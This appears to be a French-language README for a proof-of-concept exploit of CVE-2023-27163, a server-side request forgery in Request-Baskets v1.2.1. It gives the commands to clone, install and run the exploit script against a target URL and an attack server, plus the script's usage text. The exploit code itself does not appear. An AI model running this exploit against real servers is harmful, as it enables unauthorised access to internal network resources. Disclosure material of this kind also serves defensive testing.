
Preuve de concept pour CVE-2023-27163 : Server-Side Request Forgery (SSRF) dans Request-Baskets v1.2.1 via des requêtes API malveillantes pour accéder aux ressources réseau internes.
Request-Baskets v1.2.1 - Falsification de requête côté serveur (SSRF)
request-baskets jusqu'à la v1.2.1 s'est avéré contenir une vulnérabilité de type Server-Side Request Forgery (SSRF) via le composant /api/baskets/{name}. Cette vulnérabilité permet aux attaquants d'accéder à des ressources réseau et à des informations sensibles via une requête API spécialement conçue.
git clone https://github.com/0xFTW/CVE-2023-27163
cd CVE-2023-27163
pip3 install -r requirements.txt
python3 CVE-2023-27163.py url attack_server
Script d'exploitation de Request Baskets
arguments positionnels :
url chemin principal (/) du serveur (ex. http://127.0.0.1:5000/)
attack_server ATTACK_SERVER
options :
-h, --help affiche ce message d'aide et quitte